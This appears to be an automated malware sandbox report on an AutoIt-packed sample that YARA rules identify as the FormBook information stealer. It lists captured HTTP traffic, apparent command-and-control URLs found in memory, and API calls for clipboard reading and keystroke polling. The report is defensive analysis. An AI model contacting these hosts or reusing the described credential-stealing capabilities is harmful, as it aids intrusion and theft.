Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: cda6cc78-d276-4ac2-9725-501786e796d5-1713490235server-timing: processing;dur=6content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=cda6cc78-d276-4ac2-9725-501786e796d5-1713490235x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=cda6cc78-d276-4ac2-9725-501786e796d5-1713490235x-dc: gcp-us-east1,gcp-us-east1,us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRf826TXxxIhCXJLtQ1zlA2YkG54J3W7M%2B8%2F07HO3K1BazAuAm1zeNGz4N0d7k3Ufz4qq2%2B2XgimMfkwF0BeWeWBDB5%2F0ls0lwx0dND4uFcJ9BeSMcnSAVH5R%2FymJkxdMAOrTvHjlBhI"}],"group":"cf-nel","max_ageData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 047a14c3-49e7-4a15-a366-3f04c486f093-1713490237server-timing: processing;dur=8content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=047a14c3-49e7-4a15-a366-3f04c486f093-1713490237x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=047a14c3-49e7-4a15-a366-3f04c486f093-1713490237x-dc: gcp-us-east1,gcp-us-east1,us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDNXxfaq1bk2MetZq15RSdG7WKLZBIU6r5%2BWOgQwJzLFx8mdGs%2FRe5IK2ZsEcVt%2ByWiWNpMQNHHW410VFQkOFMs6PUhLtAeJT8CENW5Ub%2BJeXe2NrJoAXZbEZUtuWYiA6u%2B7Im7t8pNg"}],"group":"cf-nel","max_ageData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240server-timing: processing;dur=6content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3c1b5734-dcf3-4162-9b06-ab0e845d49f5-1713490240x-dc: gcp-us-east1,gcp-us-east1,us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnzzLuWVueIGoY5i%2F%2BJm0BVFK0HI1Ifx1P3Tt2XcgEQAmLLFjwrhSCoqiqPZxVIpIzP2nGGiHg7Ehxdy8TfzZ%2BSxuN6vVJAQozSa9Yukhu9F7kxbaQs%2BF8O9NVF4oBLhecEg4KAeBYf5"}],"group":"cf-nel","max_age":Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1X-Storefront-Renderer-Rendered: 1Vary: Accept-Encodingvary: Acceptx-frame-options: DENYcontent-security-policy: frame-ancestors 'none';x-shopid: x-shardid: -1powered-by: Shopifyserver-timing: processing;dur=7, asn;desc="212238", edge;desc="ATL", country;desc="US", pageType;desc="404", servedBy;desc="6nzr", requestID;desc="9e515b67-9f63-4a35-9be0-3571a8f90e39-1713490243"x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1x-request-id: 9e515b67-9f63-4a35-9be0-3571a8f90e39-1713490243CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkAIRzwgTkyOTTYddPcfEPZeYcSiSliXmWRnLC7kuAojrrsdufA7Yq%2F7ooLjfbnzpwfdT57rb5IIaghAjxuZPX%2F9HxTP97QWDcFPtBEL%2FODJJxaU9Do%2FuEXyic9bxb4nEJY3NOWlfeZy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=74.000120X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 876921831ed97b98-ATLalt-svc: h3=":443"; mData Raw: Data Ascii:

Source: netbtugc.exe, 00000004.00000002.4580670219.00000000047AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: lXlvzubPaBLtjusO.exe, 00000008.00000002.4581391974.0000000004E7F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: lXlvzubPaBLtjusO.exe, 00000008.00000002.4581391974.0000000004E7F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://accounts.shopify.com/rec
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Regular.woff2?v=1674610915
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004AD2000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000038D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004AD2000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000038D2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.2460240047.0000000007E82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033n
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.4576762013.00000000030BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000002.4580670219.000000000448A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.000000000328A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 00000004.00000002.4580670219.000000000448A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.000000000328A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580670219.0000000004F88000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003D88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.4580670219.000000000511A000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003F1A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?bD=mxnR
Source: netbtugc.exe, 00000004.00000002.4580670219.00000000042F8000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9b
Source: netbtugc.exe, 00000004.00000002.4580670219.00000000042F8000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr
Source: netbtugc.exe, 00000004.00000003.2464223271.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.4580670219.00000000047AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: netbtugc.exe, 00000004.00000002.4582885240.0000000006460000.00000004.00000800.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.00000000035AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.shopify.com/?utm_source=ExpiredDomainLink&utm_medium=textlink&utm_campaign=breadcrumb
Source: netbtugc.exe, 00000004.00000002.4580670219.0000000004DF6000.00000004.10000000.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000002.4579153517.0000000003BF6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.shopify.com/admin/settings/domains

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009D425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009D425A

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009D4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009D4458

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

0_2_009D425A

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009C0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_009C0219

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009ECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_009ECDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00963B4C
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2bee410d-9
